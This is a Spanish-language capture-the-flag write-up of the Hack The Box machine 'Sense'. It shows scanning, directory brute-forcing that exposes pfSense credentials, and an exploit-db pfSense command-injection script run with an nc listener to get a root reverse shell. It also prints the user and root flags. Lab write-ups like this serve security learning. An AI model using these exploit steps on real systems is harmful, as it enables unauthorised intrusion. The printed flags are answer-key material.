[HTB] Sense

Hoy vamos a hackear la maquina de HTB llamada Sense.
  • Video
  • Enumeration
  • Para empezar hacemos un nmap para ver que puertos tiene abiertos.
    sml@Cassandra:~$ sudo nmap -sV -sS -p- 10.10.10.60 [sudo] password for sml: Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 17:45 CEST Nmap scan report for 10.10.10.60 Host is up (0.049s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 80/tcp open http lighttpd 1.4.35 443/tcp open ssl/https? Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 267.68 seconds
    Buscamos si hay algo interesante en la web...
    sml@Cassandra:~$ gobuster dir -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt -k =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: https://10.10.10.60 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: txt [+] Timeout: 10s =============================================================== 2020/05/12 15:57:35 Starting gobuster =============================================================== /themes (Status: 301) /css (Status: 301) /includes (Status: 301) /javascript (Status: 301) /changelog.txt (Status: 200) /classes (Status: 301) /widgets (Status: 301) /tree (Status: 301) /shortcuts (Status: 301) /installer (Status: 301) /wizards (Status: 301) /csrf (Status: 301) /system-users.txt (Status: 200)
    Visitamos https://10.10.10.60/system-users.txt y podemos ver los credenciales para acceder a Pfsense... Miramos la version y buscamos algun exploit que podamos utilizar.
    sml@Cassandra:~$ searchsploit pfsense ----------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ----------------------------------- ---------------------------------------- pfSense - 'interfaces.php?if' Cros | exploits/hardware/remote/35071.txt pfSense - 'pkg.php?xml' Cross-Site | exploits/hardware/remote/35069.txt pfSense - 'pkg_edit.php?id' Cross- | exploits/hardware/remote/35068.txt pfSense - 'status_graph.php?if' Cr | exploits/hardware/remote/35070.txt pfSense - (Authenticated) Group Me | exploits/unix/remote/43193.rb pfSense 2 Beta 4 - 'graph.php' Mul | exploits/php/remote/34985.txt pfSense 2.0.1 - Cross-Site Scripti | exploits/php/webapps/23901.txt pfSense 2.1 build 20130911-1816 - | exploits/php/webapps/31263.txt pfSense 2.2 - Multiple Vulnerabili | exploits/php/webapps/36506.txt pfSense 2.2.5 - Directory Traversa | exploits/php/webapps/39038.txt pfSense 2.3.1_1 - Command Executio | exploits/php/webapps/43128.txt pfSense 2.3.2 - Cross-Site Scripti | exploits/php/webapps/41501.txt pfSense 2.4.1 - Cross-Site Request | exploits/php/remote/43341.rb pfSense 2.4.4-P3 - 'User Manager' | exploits/freebsd/webapps/48300.txt pfSense 2.4.4-p1 (HAProxy Package | exploits/php/webapps/46538.txt pfSense 2.4.4-p1 - Cross-Site Scri | exploits/multiple/webapps/46316.txt pfSense 2.4.4-p3 (ACME Package 0.5 | exploits/php/webapps/46936.txt pfSense < 2.1.4 - 'status_rrd_grap | exploits/php/webapps/43560.py pfSense Community Edition 2.2.6 - | exploits/php/webapps/39709.txt pfSense Firewall 2.2.5 - Config Fi | exploits/php/webapps/39306.html pfSense Firewall 2.2.6 - Services | exploits/php/webapps/39695.txt pfSense UTM Platform 2.0.1 - Cross | exploits/freebsd/webapps/24439.txt ----------------------------------- ---------------------------------------- Shellcodes: No Result
  • Exploitation
  • Elegimos pfSense < 2.1.4 - 'status_rrd_grap exploits/php/webapps/43560.py Ponemos un nc a la escucha...
    sml@Cassandra:~$ nc -nlvp 5555 listening on [any] 5555 ...
    Y lanzamos el exploit.
    sml@Cassandra:~$ python3 /usr/share/exploitdb/exploits/php/webapps/43560.py --rhost 10.10.10.60 --lhost 10.10.14.3 --lport 5555 --username rohit --password pfsense CSRF token obtained Running exploit... Exploit completed
    Obtenemos una root shell :)
    sml@Cassandra:~$ nc -nlvp 5555 listening on [any] 5555 ... connect to [10.10.14.3] from (UNKNOWN) [10.10.10.60] 55495 sh: can't access tty; job control turned off #
  • user.txt
  • # cd /home # ls .snap rohit # cd rohit # ls .tcshrc user.txt # cat user.txt 8721327cc232073b40d27d9c17e7348b#
  • root.txt
  • # cd /root # ls .cshrc .first_time .gitsync_merge.sample .hushlogin .login .part_mount .profile .shrc .tcshrc root.txt # cat root.txt d08c32a5d4f8c8b10e76eb51a69f1a86 #
  • End
  • Y con esto ya tendriamos el flag del "user" y el flag de "root".